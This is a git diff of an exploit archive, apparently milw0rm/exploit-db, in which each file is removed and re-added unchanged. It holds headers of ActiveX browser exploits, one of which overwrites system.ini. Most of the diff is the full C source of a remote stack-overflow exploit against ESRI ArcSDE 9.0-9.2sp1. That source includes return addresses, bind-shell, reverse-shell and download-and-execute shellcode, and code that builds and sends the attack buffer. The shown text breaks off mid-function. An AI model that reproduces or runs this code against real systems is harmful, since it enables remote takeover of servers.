    + all software that use this ocx are vulnerable to this exploits.
    +-----------------------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-06-12] diff --git a/platforms/windows/remote/4061.html b/platforms/windows/remote/4061.html index 1247cd5ab..350fee546 100755 --- a/platforms/windows/remote/4061.html +++ b/platforms/windows/remote/4061.html @@ -1,30 +1,30 @@ - - - -process.init(file);process.run(true,{},0);alert(process) - - -# milw0rm.com [2007-06-12] + + + +process.init(file);process.run(true,{},0);alert(process) + + +# milw0rm.com [2007-06-12] diff --git a/platforms/windows/remote/4109.html b/platforms/windows/remote/4109.html index f3f7d23c2..7872a5632 100755 --- a/platforms/windows/remote/4109.html +++ b/platforms/windows/remote/4109.html @@ -1,44 +1,44 @@ -
    ---------------------------------------------------------------------------------------------------
    - NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method
    - url: http://www.nctsoft.com/products/NCTAudioEditor2/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not be responsible for any damage.
    - 
    - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits.
    ---------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-06-26] +
    +--------------------------------------------------------------------------------------------------
    + NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method
    + url: http://www.nctsoft.com/products/NCTAudioEditor2/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits.
    +--------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-06-26] diff --git a/platforms/windows/remote/4119.html b/platforms/windows/remote/4119.html index 1e7292dcc..76f62d4f0 100755 --- a/platforms/windows/remote/4119.html +++ b/platforms/windows/remote/4119.html @@ -1,79 +1,79 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - - - - -Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write - - -

    Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write


    - - - - - - - - - -# milw0rm.com [2007-06-27] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + + + + +Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write + + +

    Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write


    + + + + + + + + + +# milw0rm.com [2007-06-27] diff --git a/platforms/windows/remote/4123.html b/platforms/windows/remote/4123.html index d8fb649e0..f8b5c9672 100755 --- a/platforms/windows/remote/4123.html +++ b/platforms/windows/remote/4123.html @@ -1,60 +1,60 @@ - - - - - - -# milw0rm.com [2007-06-28] + + + + + + +# milw0rm.com [2007-06-28] diff --git a/platforms/windows/remote/4146.cpp b/platforms/windows/remote/4146.cpp index 89d18a53c..4fc8538c4 100755 --- a/platforms/windows/remote/4146.cpp +++ b/platforms/windows/remote/4146.cpp 
@@ -1,793 +1,793 @@
-/* Dreatica-FXP crew
-*
-* ----------------------------------------
-* Target : ESRI ArcSDE 9.0 - 9.2sp1
-* Site : http://www.esri.com
-* Found by : iDefense, http://labs.idefense.com/intelligence/vulnerabilities/
-* ----------------------------------------
-* Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow exploit
-* Exploit date : 26.06.2007
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS : Windows ALL
-* Crew : Dreatica-FXP
-* ----------------------------------------
-* Info : Trivially exploitable stack overflow vulnerability: if we send more than 516 bytes to
-* server, we can overwrite EIP. After the EIP gets overwritten we can see that the ESP
-* points to the next bytes of buffer after EIP, so we simply write shellcode at 520 byte.
-* The server allows any type of buffer even with the 0x00 bytes, so have fun!
-* For use universal RET's you need to find the ArcSDE version (this is not a trivial job :P)
-*
-* Seems that the earlier versions are also vulnerable. To protect the server against that
-* vulnerability you need to install ArcSDE 9.2sp2.
-* ----------------------------------------
-* Compiling :
-* To compile this exploit you need:
-* 1. Windows C/C++ compiler
-* 2. WinSock 2
-* ----------------------------------------
-* Thanks to :
-* 1. iDefense ( http://labs.idefense.com/intelligence/vulnerabilities/ )
-* 2. The Metasploit project ( http://metasploit.com )
-* 3. ALPHA 2: Zero-tolerance ( )
-* 4. anghell at Dreatica-FXP ( )
-* 5. Dreatica-FXP crew ( http://www.dreatica.cl )
-* ----------------------------------------
-* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be
-* responsible for any damage, caused by that code. 
-************************************************************************************ -*/ - -#include -#include -#include -#include -#include -#pragma comment(lib,"ws2_32") - - -void usage(char * s); -void logo(); -void end_logo(); -void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url); -void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url); -int get_version(char * remotehost, int port); -int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port); -SOCKET do_connect (char *remotehost, int port); -SOCKET do_connect_async (char *remotehost, int port); -int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); - -static long timeout = 2000 ; // 2 sec - - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring); -char *optarg; // global argument pointer -int optind = 0, opterr; // global argv index -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - - -struct _target{ - const char *t ; - unsigned long ret ; -} targets[]= - { - {"UNIV: AcrSDE 9.0 [sdesqlsrvr90.dll] ( MSSQL )", 0x1015c357 },// jmp esp - {"UNIV: AcrSDE 9.1 [sdesqlsrvr91.dll] ( MSSQL )", 0x1015e3e7 },// jmp esp - {"UNIV: AcrSDE 9.2 [sdesqlsrvr92.dll] ( MSSQL )", 0x1008d742 },// jmp esp - {"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77a96758 },// jmp esp - {"Windows XP SP1 RUSSIAN [advapi32.dll]", 0x77e1d9d3 },// jmp esp - {"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d16817f },// jmp esp - {"Windows XP SP2 ENGLISH [ole32.dll]", 0x77548952 },// jmp esp - {"Windows XP SP2 DUTCH [ntdll.dll]", 0x7c941eed },// jmp esp - {"Windows 2003 SP0 ENGLISH [shell32.dll]", 0x77add723 },// jmp esp - {"Debug / DoS", 0x42424242 }, - {NULL, 
0x00000000 } - }; - - -struct { - const char * name; - int length; - char * shellcode; -}shellcodes[]={ - {"Bindshell, port 4444 [ args: none ]", 696, - /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" - "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" - "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" - "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" - "\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" - "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" - "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" - "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" - "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" - "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" - "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" - "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" - "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" - "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" - "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" - "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" - "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" - "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" - "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" - "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" - "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" - "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" - "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" - "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" - 
"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" - "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" - "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" - "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" - "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" - "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" - "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" - "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" - "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" - "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" - "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" - "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" - "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" - "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" - "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" - "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" - "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" - "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" - "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" - }, - - - {"ReverseShell [ args: -I -P ]", 316, - "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA" - "\xEB\x05\xE8\xEB\xFF\xFF\xFF" - "\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49" - "\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2" - "\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49" - "\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2" - "\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92" - "\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2" - "\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1" - "\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69" - 
"\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B" - "\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93" - "\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D" - "\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE" - "\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83" - "\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1" - "\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49" - "\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01" - "\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7" - "\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68" - "\xA2\x25\xBB\x04\xBB" - }, - {"Download and execute [ args: -u ]", 729, - /* win32_download_exec - http://metasploit.com */ - /* encoded by "ALPHA 2: Zero-tolerance. */ - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" - "\x49\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51" - "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" - "\x75\x4A\x49\x58\x6B\x36\x70\x71\x4A\x33\x7A\x76\x53\x59\x59\x71" - "\x76\x38\x39\x57\x4C\x35\x51\x6B\x30\x74\x74\x74\x4A\x6E\x79\x39" - "\x72\x7A\x5A\x78\x6B\x36\x65\x4D\x38\x7A\x4B\x4B\x4F\x4B\x4F\x4B" - "\x4F\x54\x30\x50\x4C\x4E\x79\x6C\x59\x5A\x39\x4F\x33\x79\x6D\x55" - "\x68\x6C\x69\x5A\x39\x4E\x79\x4A\x39\x34\x52\x58\x59\x6E\x75\x54" - "\x52\x4B\x59\x6D\x55\x36\x54\x45\x42\x7A\x79\x6F\x61\x56\x72\x53" - "\x71\x34\x52\x5A\x4A\x6D\x75\x76\x72\x4A\x4D\x4E\x67\x4D\x31\x6F" - "\x6A\x72\x4A\x36\x72\x6B\x57\x4E\x59\x4F\x6A\x33\x52\x76\x72\x6E" - "\x37\x4C\x4D\x6F\x5A\x74\x34\x7A\x6F\x48\x4E\x79\x58\x55\x42\x4D" - "\x76\x4C\x5A\x73\x52\x74\x52\x32\x4B\x6B\x43\x4C\x57\x49\x50\x52" - "\x4A\x75\x6F\x7A\x4D\x4A\x31\x69\x50\x59\x56\x54\x5A\x51\x4E\x4F" - "\x6D\x69\x4C\x33\x4B\x64\x30\x4B\x70\x6F\x36\x6B\x77\x54\x52\x73" - "\x64\x62\x32\x79\x4F\x4D\x6D\x6E\x7A\x70\x5A\x73\x78\x70\x78\x4F" - 
"\x6A\x62\x78\x6D\x7A\x50\x50\x4B\x4F\x75\x42\x4A\x31\x75\x42\x4B" - "\x6F\x6F\x75\x4D\x4A\x61\x4A\x52\x78\x52\x58\x4D\x4B\x6E\x7A\x50" - "\x58\x66\x72\x4D\x49\x6D\x4A\x51\x4A\x56\x72\x55\x33\x62\x32\x50" - "\x6E\x55\x4A\x51\x4F\x4E\x77\x75\x42\x63\x79\x49\x63\x4D\x4D\x39" - "\x50\x32\x51\x4B\x79\x4D\x49\x6D\x49\x6E\x79\x76\x7A\x51\x4F\x4C" - "\x54\x68\x4B\x78\x4F\x71\x76\x6A\x6E\x55\x35\x59\x53\x77\x62\x53" - "\x71\x4B\x43\x4E\x78\x39\x50\x31\x61\x59\x34\x4D\x49\x4C\x59\x6E" - "\x79\x46\x7A\x71\x4F\x6F\x7A\x6A\x6F\x69\x4F\x74\x59\x4D\x77\x77" - "\x69\x78\x6C\x73\x53\x37\x69\x6E\x4F\x37\x69\x7A\x67\x75\x4A\x73" - "\x45\x6E\x59\x75\x42\x71\x55\x6B\x43\x78\x39\x4B\x7A\x45\x36\x68" - "\x4E\x73\x45\x31\x4E\x6D\x4D\x4F\x6A\x39\x55\x79\x68\x6E\x57\x4B" - "\x4C\x51\x4E\x6B\x6D\x4F\x6A\x4D\x4D\x38\x61\x79\x6C\x6C\x59\x6A" - "\x39\x4F\x5A\x70\x59\x4B\x79\x79\x59\x6A\x6A\x4A\x6F\x39\x59\x73" - "\x56\x48\x4E\x53\x55\x55\x42\x71\x55\x6B\x79\x6A\x6A\x50\x66\x48" - "\x4E\x65\x39\x6A\x69\x65\x36\x78\x4E\x50\x6D\x6F\x5A\x52\x79\x30" - "\x35\x35\x4C\x50\x59\x4A\x4C\x31\x70\x58\x48\x78\x4B\x78\x4F\x6A" - "\x6A\x52\x46\x50\x4B\x68\x43\x6B\x70\x74\x72\x73\x4B\x70\x77\x4F" - "\x5A\x56\x39\x73\x6A\x61\x61\x4D\x6F\x63\x56\x43\x56\x75\x36\x4B" - "\x6E\x79\x6C\x7A\x4D\x6F\x39\x78\x6B\x58\x76\x6B\x4A\x78\x58\x4B" - "\x4D\x6B\x4D\x5A\x4B\x4B\x4C\x4A\x4A\x7A\x4A\x5A\x39\x59\x4E\x6B" - "\x4C\x48\x6D\x5A\x6A\x6B\x50\x4B\x5A\x5A\x4D\x4B\x4C\x4B\x44\x6B" - "\x6D\x6C\x30\x4A\x4B\x6B\x4C\x79\x6A\x58\x6D\x59\x66\x5A\x4B\x59" - "\x70\x68\x58\x4D\x49\x7A\x6E\x6A\x50\x4C\x37\x4B\x6C\x6D\x31\x6B" - "\x4C\x6B\x4A\x6C\x59\x4B\x6C\x6B\x51\x5A\x50\x48\x6D\x4A\x6D\x68" - "\x71\x4A\x4B\x79\x6C\x59\x68\x6B\x4D\x4F\x69\x6E\x35\x4B\x46\x6B" - "\x48\x4B\x4D\x4E\x35\x78\x70\x6B\x4B\x4A\x4B\x7A\x58\x48\x6B\x4B" - "\x50\x4A\x78\x4C\x59\x4A\x4C\x4A\x4B\x6A\x55\x59\x64\x4C\x36\x6B" - "\x47\x4E\x79\x68\x4C\x38\x4B\x7A\x75\x4B\x6D\x79\x66\x7A\x4E\x4B" - "\x47\x39\x65\x4A\x56\x58\x78\x4B\x4D\x7A\x6D\x4C\x36\x59\x4F\x78" 
- "\x70\x7A\x55\x39\x6C\x6E\x38\x6D\x49" - }, - {NULL , NULL } -}; - - - -int main(int argc, char **argv) -{ - char * remotehost=NULL, * cbip=NULL, *url=NULL; - char default_remotehost[]="127.0.0.1"; - char default_cbip[]="127.0.0.1"; - char temp1[100], temp2[100]; - int cbport, port, itarget, sh; - char ss[100]; - SOCKET s; - char c; - int option_index=0; - logo(); - WSADATA wsa; - WSAStartup(MAKEWORD(2,0), &wsa); - if(argc<2) - { - usage(argv[0]); - return -1; - } - - // set defaults - cbport=4444; - port=5151; - itarget=-1; - sh=0; - // ------------ - - while((c = getopt(argc, argv, "h:p:s:t:I:P:u:"))!= EOF) - { - switch (c) - { - case 'h': - remotehost=optarg; - break; - case 's': - sscanf(optarg, "%d", &sh); - sh--; - break; - case 't': - sscanf(optarg, "%d", &itarget); - itarget--; - break; - case 'p': - sscanf(optarg, "%d", &port); - break; - case 'P': - sscanf(optarg, "%d", &cbport); - break; - case 'I': - cbip=optarg; - break; - case 'u': - url=optarg; - break; - default: - usage(argv[0]); - WSACleanup(); - return -1; - } - } - if(remotehost == NULL) remotehost=default_remotehost; - if(cbip == NULL) cbip=default_cbip; - if(url == NULL) url=""; - memset(temp1,0,sizeof(temp1)); - memset(temp2,0,sizeof(temp2)); - memset(temp1, '\x20' , 58 - strlen(remotehost) -1); - printf(" # Host : %s%s# \n", remotehost, temp1); - sprintf(temp2, "%d", port); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Port : %s%s# \n", temp2, temp1); - memset(temp1,0,sizeof(temp1)); - memset(temp2,0,sizeof(temp2)); - sprintf(temp2, "%s", shellcodes[sh].name ); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # Payload : %s%s# \n", temp2, temp1); - if(itarget!=-1) - { - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1); - printf(" # Target : %s%s# \n", targets[itarget].t, temp1); - }else - { - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen("Please select target") -1); 
- printf(" # Target : %s%s# \n", "Please select target", temp1); - } - if(sh==1) - { - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(cbip) -1); - printf(" # CB IP : %s%s# \n", cbip, temp1); - sprintf(temp2, "%d", cbport); - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(temp2) -1); - printf(" # CB port : %s%s# \n", temp2, temp1); - } - printf(" # ------------------------------------------------------------------- # \n"); - fflush(stdout); - printf(" [+] Checking if server is online\n"); - fflush(stdout); - s=do_connect(remotehost, port); - if(s==-1) - { - printf(" [-] Server is OFFLINE\n"); - end_logo(); - return 0; - } - closesocket(s); - printf(" [+] Server is ONLINE\n"); - - if(itarget==-1) - { - itarget = get_version(remotehost, port); - if(itarget>=0) - { - printf(" [+] Target: %s%\n", targets[itarget].t); - }else - { - printf(" [-] Please select target\n"); - WSACleanup(); - end_logo(); - return -1; - } - } - - unsigned char buf[10000]; - unsigned int len; - memset(buf,0,sizeof(buf)); - fflush(stdout); - make_buffer(buf, &len, itarget, sh, cbip, cbport, url); - - printf(" [+] Attacking buffer constructed\n"); - - if(send_buffer(buf, len, remotehost,port)==-1) - { - printf(" [-] Cannot exploit server %s\n", remotehost); - end_logo(); - WSACleanup(); - return -1; - } - - printf(" [+] Buffer sent\n"); - - if(sh==0)sprintf(ss, " [+] Connect to %s:%d\n", remotehost, 4444); - if(sh==1)sprintf(ss, " [+] The shell should arrive at %s:%d\n", cbip, cbport); - if(sh==2)sprintf(ss, " [+] File is downloaded and executred\n"); - printf("%s", ss); - end_logo(); - WSACleanup(); - return 0; -} - - - -SOCKET do_connect (char *remotehost, int port) -{ - static struct hostent *host; - static struct sockaddr_in addr; - SOCKET s; - host = gethostbyname(remotehost); - if (!host) - { - perror("[-] gethostbyname() failed"); - return -1; - } - addr.sin_addr = *(struct in_addr*)host->h_addr; - - s = socket(PF_INET, SOCK_STREAM, 0); - if (s == 
-1) - { - closesocket(s); - perror("socket() failed"); - return -1; - } - - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) - { - closesocket(s); - return -1; - } - - - return s; -} - -SOCKET do_connect_async (char *remotehost, int port) -{ - static struct hostent *host; - static struct sockaddr_in addr; - SOCKET s; - host = gethostbyname(remotehost); - if (!host) - { - perror("[-] gethostbyname() failed"); - return -1; - } - addr.sin_addr = *(struct in_addr*)host->h_addr; - - s = socket(PF_INET, SOCK_STREAM, 0); - if (s == -1) - { - closesocket(s); - perror("socket() failed"); - return -1; - } - - - unsigned long l = 1; - if ( ioctlsocket( s, FIONBIO, &l ) != 0 ) - { - fprintf( stderr, "Failed setting socket to non-blocking mode\n" ); - closesocket( s ); - return -1; - } - - - addr.sin_port = htons(port); - addr.sin_family = AF_INET; - - if ( connect( s, (sockaddr*) &addr, sizeof( sockaddr ) ) == SOCKET_ERROR ) - { - int error = WSAGetLastError( ); - if ( ( error != WSAEWOULDBLOCK ) && ( error != WSAEINPROGRESS ) ) - { - fprintf( stderr, "Failed connecting to remote host, %d\n", error ); - closesocket( s ); - return -1; - } - } - - return s; -} - - - - - - -// get arcsde version to determine target -int get_version(char * remotehost, int port) -{ - // ---------------------------------------- - // removed due to publicity of the exploit - // ---------------------------------------- - return -1; -} - - - - - - -void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh, char * cbip, int cbport, char *url) -{ - memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); - *fshlength = shellcodes[sh].length; - if(sh==1) - { - static struct hostent *host = gethostbyname(cbip); - static struct sockaddr_in addr; - addr.sin_addr = *(struct in_addr*)host->h_addr; - fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2; - fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2; - fsh[113] 
= (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2; - fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2; - - fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2; - fsh[119] = ((cbport ) & 0xff) ^ 0xc2; - } - if(sh==2) - { - char locurl[1000]; - memset(locurl,0,sizeof(locurl)); - memcpy(locurl, url, strlen(url)); - locurl[strlen(locurl)]='\x80'; - char encoded_url[2500] ; - alphanumeric_encoder_thx_to_skylined(locurl, encoded_url); - strcat((char *)fsh, encoded_url); - *fshlength += (unsigned int)strlen(encoded_url); - } -} - -void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh, char * cbip, int cbport, char * url) -{ - // prepare shellcode - unsigned char fsh[10000]; - unsigned int fshlength; - memset(fsh, 0, sizeof(fsh)); - prepare_shellcode(fsh, &fshlength, sh, cbip, cbport, url); - // ----------------- - - // make buffer - unsigned char * cp=buf; - - // long buffer - *cp++='\x80'; - memset(cp, '\x41', 515); - cp+=515; - - //replace EIP - *cp++ = (char)((targets[itarget].ret ) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); - *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); - - // jff - *cp++ = '\x90'; - *cp++ = '\x90'; - *cp++ = '\x90'; - *cp++ = '\x90'; - - // copy shellcode - memcpy(cp, fsh, fshlength); - cp+=fshlength; - - // set the length manually cause of the 0x00 bytes - *len = (unsigned int)(cp-buf); - // ----------------- -} - - - -int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port) -{ - SOCKET sock; - char str[1000]; - int bytes; - char bufmax[4096]; - - sock = do_connect_async(remotehost, port); - if(sock==-1) - { - printf(" [-] Failed to connect to server\n"); - } - fd_set fdConnect = { 0 }; - - TIMEVAL stTime; - TIMEVAL *pstTime = NULL; - long dwTimeout=5000; - if (INFINITE != dwTimeout) - { - stTime.tv_sec = dwTimeout / 1000; - stTime.tv_usec = dwTimeout % 1000; - pstTime = &stTime; - } - if (!FD_ISSET(sock, &fdConnect)) - FD_SET(sock, 
&fdConnect); - - int res = select(NULL, NULL, &fdConnect, NULL, pstTime); - if(res==0) - { - closesocket(sock); - return -1; - } - if(res<0) - { - closesocket(sock); - return -1; - } - - bytes = send(sock, (char *)buf, len, 0); - Sleep(500); - printf(" [+] Sent %d bytes to server\n", bytes); - - fd_set active_set, read_set; - - FD_ZERO(&active_set); - FD_SET(sock, &active_set); - - read_set = active_set; - res = select(FD_SETSIZE,&read_set,NULL,NULL, pstTime); - - if (res==0) - { - closesocket(sock); - return 1; - } - - if ( res<0 ) { - closesocket(sock); - return -1; - } - - for (int i=0; i> 4; - B = (input & 0x0f); - F = B; - i = rand() % ((int)strlen(valid_chars)); - while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); } - E = valid_chars[i] >> 4; - D = (A^E); - i = rand() % ((int)strlen(valid_chars)); - while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); } - C = valid_chars[i] >> 4; - sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F); - encoded[strlen(encoded)]=temp[0]; - encoded[strlen(encoded)]=temp[1]; - } - encoded[strlen(encoded)]='A'; - return 0; -} - - - - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring) -{ - static char *next = NULL; - if (optind == 0) - next = NULL; - - optarg = NULL; - - if (next == NULL || *next == '\0') - { - 